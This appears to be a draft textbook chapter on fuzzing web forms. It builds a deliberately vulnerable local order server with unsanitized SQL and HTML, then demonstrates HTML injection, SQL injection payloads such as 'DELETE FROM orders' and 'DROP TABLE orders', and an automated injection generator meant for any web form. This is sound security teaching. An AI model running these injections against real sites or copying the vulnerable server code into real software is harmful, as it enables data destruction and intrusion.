# Web and GUI Testing

In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces.  We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface.  We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.

**Prerequisites**

* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).
* Basic knowledge of HTML and HTTP is required.
* Knowledge of SQL databases is helpful.

## A Web User Interface

Let us start with a simple example.  We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles.  In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose.  For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.

### Taking Orders

For our Web server, we need a number of Web pages:
* We want one page where customers can place an order.
* We want one page where they see their order confirmed.  
* Additionally, we need pages display error messages such as "Page Not Found".

We start with the order form.  The dictionary `fuzzingbook_swag` holds the items that customers can order, together with long descriptions:

In [None]:
import fuzzingbook_utils

In [None]:
fuzzingbook_swag = {
    "tshirt": "One FuzzingBook T-Shirt",
    "drill": "One FuzzingBook Rotary Hammer",
    "lockset": "One FuzzingBook Lock Set"
}

This is the HTML code for the order form.  The menu for selecting the swag to be ordered is created dynamically from `fuzzingbook_swag`.  We omit plenty of details such as precise shipping address, payment, shopping cart, and more.

In [None]:
html_order_form = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <!-- We don't use h2, h3, etc. here as it interferes with notebook tocs -->
  <strong style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
  <p>
  Yes! Please send me at your earliest convenience
  <select name="item">
  """

for item in fuzzingbook_swag:
    html_order_form += '<option value="{item}">{name}</option>'.format(item=item, 
        name=fuzzingbook_swag[item])

html_order_form += """
  </select>
  <br>
  <table>
  <tr><td>
  <label for="name">Name: </label><input type="text" name="name">
  </td><td>
  <label for="email">Email: </label><input type="email" name="email"><br>
  </td></tr>
  <tr><td>
  <label for="city">City: </label><input type="text" name="city">
  </td><td>
  <label for="zip">ZIP Code: </label><input type="number" name="zip">
  </tr></tr>
  </table>
  <input type="checkbox" name="tandc"><label for="tandc">I have read 
  the <a href="/">terms and conditions</a></label><br>
  <button name="submit">Place order</button>
</p>
</form>
</body></html>
"""

This is what the order form looks like:

In [None]:
from IPython.core.display import HTML, display

In [None]:
HTML(html_order_form)

This form is not yet functional, as there is no server behind it; pressing "place order" will lead you to a nonexistent page.

### Processing Orders

Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before.  Here is the HTML and the rendering:

In [None]:
html_order_received = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
  <p>
  We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
  A confirmation mail will be sent to {email}.
  </p>
</div>
</body></html>
"""

In [None]:
HTML(html_order_received.format(item_name="One FuzzingBook Rotary Hammer", 
                                name="Jane Doe", 
                                email="doe@example.com",
                                city="Seattle",
                                zip="98104"))

### Storing Orders

To store orders, we make use of a *database*, stored in the file `orders.db`.

In [None]:
import sqlite3
import os

In [None]:
ORDERS_DB = "orders.db"

In [None]:
if os.path.exists(ORDERS_DB):
    os.remove(ORDERS_DB)

In [None]:
db_connection = sqlite3.connect(ORDERS_DB)

To interact with the database, we use *SQL commands*.  The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.

In [None]:
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("""
CREATE TABLE orders
(item text, name text, email text, city text, zip text)
""")
db_connection.commit()

At this point, the database is still empty:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

We can add entries using the SQL `INSERT` command:

In [None]:
db_connection.execute("INSERT INTO orders " +
                      "VALUES ('lockset', 'Walter White', 'white@jpwynne.edu', 'Albuquerque', '87101')")
db_connection.commit()

These values are now in the database:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

We can also delete entries from the table again (say, after completion of the order):

In [None]:
db_connection.execute("DELETE FROM orders WHERE name = 'Walter White'")
db_connection.commit()

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

### Handling HTTP Requests

We have an order form and a database; now we need a Web server which brings it all together.  The Python `http.server` module provides everything we need to build a simple HTTP server.  A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.

We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages.  Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed.  All other requests end in a `Page Not Found` message.

In [None]:
from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus

In [None]:
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # print("GET " + self.path)
        if self.path == "/":
            self.send_order_form()
        elif self.path.startswith("/order"):
            self.handle_order()
        else:
            self.not_found()

#### Order Form

Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_form(self):
        self.send_response(HTTPStatus.OK, "Place your order")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(html_order_form.encode("utf8"))

#### Processing Orders

When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form

```
<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3
```

where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user.  Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.

If Jane Doe <doe@example.com> from Seattle orders a T-Shirts, this is the URL the browser creates:

```
<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104
```

When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`.  The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.

In [None]:
import urllib.parse

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def get_field_values(self):
        # Note: this fails to decode non-ASCII characters properly
        query_string = urllib.parse.urlparse(self.path).query
        
        # fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
        fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)

        values = {}
        for key in fields:
#             values[key] = urllib.parse.unquote(html.unescape(fields[key][0]))
            values[key] = fields[key][0]
        
        return values

The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order.  If anything goes wrong, it sends an internal server error.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def handle_order(self):
        try:
            values = self.get_field_values()
            self.store_order(values)
            self.send_order_received(values)
        except Exception:
            self.internal_server_error()

Storing the order makes use of the database connection defined above; we create a SQL command instantiated with the values as extracted from the URL.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def store_order(self, values):
        sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
        self.log_message("%s", sql_command)
        db_connection.executescript(sql_command)
        db_connection.commit()

After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_received(self, values):
        values["item_name"] = fuzzingbook_swag[values["item"]]  # Should use html.escape()
        confirmation = html_order_received.format(**values).encode("utf8")

        self.send_response(HTTPStatus.OK, "Order received")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(confirmation)

#### Other HTTP commands

Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page.  In our case, this is always empty.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def do_HEAD(self):
        # print("HEAD " + self.path)
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-type", "text/html")
        self.end_headers()

### Error Handling

We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.

#### Page Not Found

This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.

In [None]:
html_not_found = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Sorry.</strong>
  <p>
  This page does not exist.  Try our <a href="https://www.fuzzingbook.org/">homepage</a> instead.
  </p>
</div>
</body></html>
  """

In [None]:
HTML(html_not_found)

The method `not_found()` takes care of sending this out with the appropriate HTTP status code.

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def not_found(self):
        self.send_response(HTTPStatus.NOT_FOUND, "Not found")

        self.send_header("Content-type", "text/html")
        self.end_headers()

        message = html_not_found
        self.wfile.write(message.encode("utf8"))

#### Internal Errors

This page is shown for any internal errors that might occur.  For diagnostic purposes, we have it include the traceback of the failing function.

In [None]:
html_internal_server_error = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
  <strong style="font-size: x-large">Internal Server Error</strong>
  <p>
  The server has encountered an internal error.  Please come back later.
  <pre>{error_message}</pre>
  </p>
</div>
</body></html>
  """

In [None]:
HTML(html_internal_server_error)

In [None]:
import sys
import traceback

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def internal_server_error(self):
        self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
        
        self.send_header("Content-type", "text/html")
        self.end_headers()

        exc = traceback.format_exc()
        self.log_message("%s", exc.strip())

        message = html_internal_server_error.format(error_message=exc)
        self.wfile.write(message.encode("utf8"))

### Logging

Our server runs as a separate process in the background, waiting to receive commands at all time.  To see what it is doing, we implement a special logging mechanism.  The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them.  We use this to pass log messages from the server, whcih we can than display in the notebook.

In [None]:
from multiprocessing import Queue

In [None]:
httpd_message_queue = Queue()

Let us place two messages in the queue:

In [None]:
httpd_message_queue.put("I am another message")

In [None]:
httpd_message_queue.put("I am one more message")

To distinguish server messages from other parts of the notebook, we format them specially:

In [None]:
def display_httpd_message(message):
    if fuzzingbook_utils.rich_output():
        display(HTML('<pre style="background: NavajoWhite; font-size: small">' + message + "</pre>"))
    else:
        print(message, end="")

In [None]:
display_httpd_message("I am a httpd server message")

The method `print_httpd_messages()` prints all messages accumulated in the queue so far:

In [None]:
def print_httpd_messages():
    while not httpd_message_queue.empty():
        message = httpd_message_queue.get()
        display_httpd_message(message)

In [None]:
import time

In [None]:
time.sleep(1)
print_httpd_messages()

The method `log_message()` in the request handler makes use of the queue to store its messages:

In [None]:
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        message = ("%s - - [%s] %s\n" %
                         (self.address_string(),
                          self.log_date_time_string(),
                          format % args))
        httpd_message_queue.put(message)

In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL.  We now extend it such that it also prints out any log messages produced by the server:

In [None]:
from Carver import webbrowser as simple_webbrowser

In [None]:
def webbrowser(url, mute=False):
    try:
        contents = simple_webbrowser(url)
    finally:
        if not mute:
            print_httpd_messages()
        else:
            # Clear queue silently
            while not httpd_message_queue.empty():
                httpd_message_queue.get()

    return contents

### Running the Server

After all these definitions, we are now ready to get the Web server up and running.  We run the server on the *local host* – that is, the same machine which also runs this notebook.  We check for an accessible port and put the resulting URL in the queue created earlier.

In [None]:
def run_httpd():
    host = "127.0.0.1"  # localhost IP
    for port in range(8800, 9000):
        httpd_address = (host, port)

        try:
            httpd = HTTPServer(httpd_address, SimpleHTTPRequestHandler)
            break
        except OSError:
            continue

    httpd_url = "http://" + host + ":" + repr(port)
    httpd_message_queue.put(httpd_url)
    httpd.serve_forever()

The server runs in a separate process, which we start using the `multiprocessing` module.

In [None]:
from multiprocessing import Process

In [None]:
httpd_process = Process(target=run_httpd)
httpd_process.start()

At this point, the Web server is running.  We retrieve its URL from the queue:

In [None]:
httpd_url = httpd_message_queue.get()
httpd_url

### Interacting with the Server

Let us now access the server just created.

#### Direct Browser Access

If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL.  Simply click on the given address:

In [None]:
HTML('<pre><a href="' + httpd_url + '">' + httpd_url + "</a></pre>")

Even more convenient, you may be able to interact directly with the server using the window below.  (If you do not see a Web page, that's likely because you are using a remote notebook server; these typically do not allow access to self-defined services.)

In [None]:
HTML('<iframe src="' + httpd_url + '" ' + 'width="100%" height="230"/>')

After interaction, you can retrieve the messages produced by the server:

In [None]:
print_httpd_messages()

We can also see any orders placed in the database:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

And we can clear the order database:

In [None]:
db_connection.execute("DELETE FROM orders")
db_connection.commit()

#### Retrieving the Home Page

Even if our browser cannot directly interact with the server, the _notebook_ can.  We can, for instance, retrieve the contents of the home page and display them:

In [None]:
contents = webbrowser(httpd_url)

In [None]:
HTML(contents)

#### Placing Orders

To test this form, we can generate URLs with orders and have the server process them.

The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.

In [None]:
from urllib.parse import urljoin

In [None]:
urljoin(httpd_url, "/order?foo=bar")

With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form.  Sending this URL to the browser effectively places the order, as we can see in the server log produced:

In [None]:
time.sleep(2)

In [None]:
contents = webbrowser(urljoin(httpd_url, 
                "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))

The web page returned confirms the order:

In [None]:
HTML(contents)

And the order is in the database, too:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

#### Error Messages

We can also test whether the server correctly responds to invalid requests.  Nonexistent pages, for instance, are correctly handled:

In [None]:
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))

You may remember we also have a page for internal server errors.  Can we get the server to produce this page?  To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.

## Fuzzing A Web Form

After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.

### Fuzzing with Expected Values

Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs.  It comes with a few sample values for names, email addresses, cities and (random) digits.

In [None]:
from Grammars import crange, is_valid_grammar

In [None]:
ORDER_GRAMMAR = {
    "<start>": [ "<order>" ],
    "<order>": [ "/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>" ],
    "<item>": [ "tshirt", "drill", "lockset" ],
    "<name>": [ "Jane+Doe", "John+Smith" ],
    "<email>": [ "j.doe%40example.com", "j_smith%40example.com"],
    "<city>": [ "Seattle", "New+York"],
    "<zip>": [ "<digit>" * 5 ],
    "<digit>": crange('0', '9')
}

In [None]:
assert is_valid_grammar(ORDER_GRAMMAR)

Using [one of our grammar fuzzers](GrammarFuzzer.iynb), we can instantiate this grammar and generate URLs:

In [None]:
from GrammarFuzzer import GrammarFuzzer

In [None]:
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]

Sending these URLs to the server will have them processed correctly:

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

### Fuzzing with Unexpected Values

We can now see that the server does a good job when faced with "standard" values.  But what happens if we feed it non-standard values?  To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL.  Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:

In [None]:
seed = order_fuzzer.fuzz()
seed

Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.

In [None]:
from MutationFuzzer import MutationFuzzer

In [None]:
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]

Let us fuzz a little until we get an internal server error.  We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.

In [None]:
import requests

In [None]:
while True:
    path = mutate_order_fuzzer.fuzz()
    url = urljoin(httpd_url, path)
    r = requests.get(url)
    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
        break

That didn't take long.  Here's the offending URL:

In [None]:
url

In [None]:
HTML(webbrowser(url))

How does the URL cause this internal error?  We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:

In [None]:
failing_path = path
failing_path

In [None]:
from Fuzzer import Runner

In [None]:
class WebRunner(Runner):
    def run(self, path):
        url = urljoin(httpd_url, path)
        r = requests.get(url)
        if r.status_code == HTTPStatus.OK:
            return path, Runner.PASS
        elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
            return path, Runner.FAIL
        else:
            return path, Runner.UNRESOLVED

In [None]:
web_runner = WebRunner()
web_runner.run(failing_path)

This is the mininized path:

In [None]:
from Reducer import DeltaDebuggingReducer

In [None]:
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path

It turns out that our server encounters an internal error if we do not supply the requested fields:

In [None]:
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url

In [None]:
while not httpd_message_queue.empty():
    httpd_message_queue.get()

HTML(webbrowser(minimized_url))

We see that we might have a lot to do to make our Web Server more robust against unexpected inputs.  The [exercises](#Exercises) give some instructions on what to do.

## Crafting Web Attacks

More interesting, though: Values that are not as common as these

In [None]:
import string

In [None]:
def cgi_encode(s):
    ret = ""
    for c in s:
        if c in string.ascii_letters or c in string.digits:
            ret += c
        elif c == ' ':
            ret += '+'
        else:
            ret += "%%%02x" % ord(c)
    return ret

In [None]:
s = cgi_encode("'DOW50' is down .24%")
s

In [None]:
from Coverage import cgi_decode

In [None]:
cgi_decode(s)

### Injecting Code

In [None]:
from Grammars import extend_grammar

In [None]:
ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [ cgi_encode('''
    Jane Doe<p>
    <strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
    </p>
    ''')],
})

In [None]:
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))

Note how the injected HTML appears in the log as well as in the HTML page produced.

By inserting arbitrary HTML content, we can easily destroy the reputation of an organization – for instance, by having the site display porn pictures.

Instead of injecting HTML, as in this example, we could also insert JavaScript code that would then automatically be executed as soon as the page is displayed.  This could be used to steal session IDs from the customer, such that others could keep on shopping without having to supply credentials.  It could also become active on Web pages used at the vendor's site, where it could be set to retrieve credentials or other means to access the entire customer database.

The remedy is: Sanitize all inputs.

### Injecting SQL Commands

In [None]:
from Grammars import extend_grammar

In [None]:
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [ cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})

In [None]:
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql

These are the current orders:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

In [None]:
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))

All orders are now gone:

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

![https://xkcd.com/327/](https://imgs.xkcd.com/comics/exploits_of_a_mom.png)

Even if we had not able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief.  For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice.

Again, the remedy is to sanitize all inputs.

### Getting Information

To craft the above SQL queries, we have used insider information – for instance, we knew the name of the table as well as its structure.  Surely, an attacker would not know this and thus not be able to run the attack, right?  Unfortunately, it turns out we are leaking all of this information out to the world in the first place.  The error message produced by our server reveals everything we need:

In [None]:
with ExpectError():
    answer = webbrowser(urljoin(httpd_url, "/order"))

In [None]:
HTML(answer)

The best way to avoid information leakage through failures is not to fail in the first place; your applciation should be robust against all sorts of inputs.

If you fail, make it hard for the attacker to establish a link between the attack and the failure. In the above case, the application could simply go back to the home page and ask the user to supply correct data.

## Extracting Grammars for Testing and Attacking Web Pages

### Searching HTML for Input Fields

In [None]:
html_doc = webbrowser(httpd_url)
html_doc

We could define a grammar to parse HTML, but it is much easier to use the existing, dedicated parser:

In [None]:
from html.parser import HTMLParser

In [None]:
class FormHTMLParser(HTMLParser):
    def reset(self):
        super().reset()
        self.fields = {}
        self.action = ""
        self.select = []

    def handle_starttag(self, tag, attrs):
        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
        # print(tag, attributes)

        if tag == "form":
            self.action = attributes.get("action", "")
            
        elif tag == "select" or tag == "datalist":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = []
                self.select.append(name)
            else:
                self.select.append(None)

        elif tag == "option":
            current_select_name = self.select[-1]
            if current_select_name is not None and "value" in attributes:
                self.fields[current_select_name].append(attributes["value"])

        elif tag == "input":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = attributes.get("type", "text")
                
        elif tag == "button":
            if "name" in attributes:
                name = attributes["name"]
                self.fields[name] = [""]

    def handle_endtag(self, tag):
        if tag == "select":
            self.select.pop()

\todo{Handle `multiple` options, `textarea`}

In [None]:
class HTMLGrammarMiner(object):
    def __init__(self, html_doc):
        html_parser = FormHTMLParser()
        html_parser.feed(html_doc)
        self.fields = html_parser.fields
        self.action = html_parser.action

In [None]:
html_miner = HTMLGrammarMiner(html_doc)
html_miner.action

In [None]:
html_miner.fields

### Mining Grammars for Web Pages

In [None]:
from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR

In [None]:
class HTMLGrammarMiner(HTMLGrammarMiner):
    QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, {
        "<start>": ["<action>?<query>"],

        "<text>": ["<string>"],

        "<number>": ["<digits>"],
        "<digits>": ["<digit>", "<digits><digit>"],
        "<digit>": crange('0', '9'),

        "<checkbox>": ["<_checkbox>"],
        "<_checkbox>": ["on", "off"],
        "<email>": ["<_email>"],
        "<_email>": ["<string>" + cgi_encode("@") + "<string>"],
        
        # Stick to printable characters to avoid logging problems
        "<percent>": ["%<hexdigit-1><hexdigit>"],
        "<hexdigit-1>": srange("34567")
    })

In [None]:
class HTMLGrammarMiner(HTMLGrammarMiner):
    def mine_grammar(self):
        grammar = extend_grammar(self.QUERY_GRAMMAR)
        grammar["<action>"] = [self.action]

        query = ""
        for field in self.fields:
            field_symbol = new_symbol(grammar, "<" + field + ">")
            field_type = self.fields[field]

            if query != "":
                query += "&"
            query += field_symbol
            
            if isinstance(field_type, str):
                grammar[field_symbol] = [field + "=<" + field_type + ">"]
            else:
                # List of values
                value_symbol = new_symbol(grammar, "<" + field + "-value>")
                grammar[field_symbol] = [field + "=" + value_symbol]
                grammar[value_symbol] = field_type

        grammar["<query>"] = [query]

        # Remove unused parts
        for nonterminal in unreachable_nonterminals(grammar):
            del grammar[nonterminal]
        assert is_valid_grammar(grammar)
            
        return grammar

In [None]:
html_miner = HTMLGrammarMiner(html_doc)
grammar = html_miner.mine_grammar()
grammar

In [None]:
grammar["<start>"]

In [None]:
grammar["<action>"]

In [None]:
grammar["<query>"]

In [None]:
grammar["<zip>"]

In [None]:
grammar["<tandc>"]

In [None]:
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

We see (one more time) that we can mine a grammar automatically from given data.

\todo{Have a `WebFuzzer` class that does it all.}

Limitations:

* Limited to one form per page; no escaping, CGI encoding, etc.
* Limited to GET actions (no POST, PUT, etc.)  Consider http://docs.python-requests.org/en/latest/api/
* No Javascript handling for dynamic Web pages
* Could use specific values (or ranges) for specific fields (e.g. ZIP as five digits)

### Fully Automatic Attacks on Web Sites

Combine with attacks as above:

In [None]:
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
    def __init__(self, html_doc, sql_payload):
        super().__init__(html_doc)
        self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
    "<text>":     ["<string>",    "<sql-injection-attack>"],
    "<number>":   ["<digits>",    "<sql-injection-attack>"],
    "<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
    "<email>":    ["<_email>",    "<sql-injection-attack>"],
    
    "<sql-injection-attack>": [ "<string>" + cgi_encode("' ") + "<sql-values>" + cgi_encode("); ") +
                                "<sql-payload>" + cgi_encode("; --") ],
    "<sql-values>": [ "", "<sql-values>" + cgi_encode(", '") + "<string>" + cgi_encode("'") ],
    "<sql-payload>": [ cgi_encode(sql_payload) ],
})

In [None]:
html_miner = SQLInjectionGrammarMiner(html_doc, sql_payload="DROP TABLE orders")

In [None]:
grammar = html_miner.mine_grammar()
grammar["<text>"]

We see that several fields now are tested for vulnerabilities:

In [None]:
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

In [None]:
contents = webbrowser(urljoin(httpd_url,
                "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))

In [None]:
def orders_db_is_empty():
    try:
        entries = db_connection.execute("SELECT * FROM orders").fetchall()
    except sqlite3.OperationalError:
        return True
    return len(entries) == 0

In [None]:
orders_db_is_empty()

In [None]:
def sql_injections(form_url, sql_payload):
    contents = webbrowser(form_url, mute=True)
    miner = SQLInjectionGrammarMiner(contents, sql_payload=sql_payload)
    grammar = miner.mine_grammar()
    fuzzer = GrammarFuzzer(grammar)
    
    while True:
        url = urljoin(form_url, fuzzer.fuzz())
        yield url

\todo{Have a `SQLWebFuzzer` class that does it all.}

`sql_injection()` is a function which, despite its limitations, you could apply on literally any form on the Web.  Of course, we apply it only on our own server:

In [None]:
trials = 0
for url in sql_injections(httpd_url, sql_payload="DROP TABLE orders"):
    print(trials, url)
    with ExpectError(mute=True):
        webbrowser(url, mute=True)
    if orders_db_is_empty():
        break
    trials += 1

In [None]:
orders_db_is_empty()

The bad news is that with a tool set as the above, anyone can attack web sites.  The even worse news is that such penetration tests take place every day, on every web site.  The better news, though, is that the large majority of Web servers is well-protected against such attacks.

## Testing other Graphical User Interfaces

General scheme is the same:

1. Identify UI elements
2. Identify value types to be filled in
3. Create a grammar that holds all UI elements and values
4. Let the grammar create things!

## Lessons Learned

* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.
* One can _mine grammars from user interfaces_, allowing for widespread testing of user interfaces.
* Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.
* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.

We're done, so we can clean up:

In [None]:
import time

In [None]:
httpd_process.terminate()

In [None]:
if os.path.exists(ORDERS_DB):
    os.remove(ORDERS_DB)

## Next Steps

_Link to subsequent chapters (notebooks) here, as in:_

* [use _mutations_ on existing inputs to get more valid inputs](MutationFuzzer.ipynb)
* [use _grammars_ (i.e., a specification of the input format) to get even more valid inputs](Grammars.ipynb)
* [reduce _failing inputs_ for efficient debugging](Reducer.ipynb)


## Background

_Cite relevant works in the literature and put them into context, as in:_

The idea of ensuring that each expansion in the grammar is used at least once goes back to Burkhardt \cite{Burkhardt1967}, to be later rediscovered by Paul Purdom \cite{Purdom1972}.

## Exercises

1. Fix the server such that

   * it does not crash with invalid or missing fields
   * it sanitizes all inputs against HTML or SQL injection attacks
   * it does not reveal internal information with internal errors

2. Protect the server.  Create a grammar that rejects invalid URLs.

3. Use coverage-driven fuzzers such that all various options are covered.

### Exercise 1: _Title_

_Text of the exercise_

In [None]:
# Some code that is part of the exercise
pass

_Some more text for the exercise_

**Solution.** _Some text for the solution_

In [None]:
# Some code for the solution
2 + 2

_Some more text for the solution_

### Exercise 2: _Title_

_Text of the exercise_

**Solution.** _Solution for the exercise_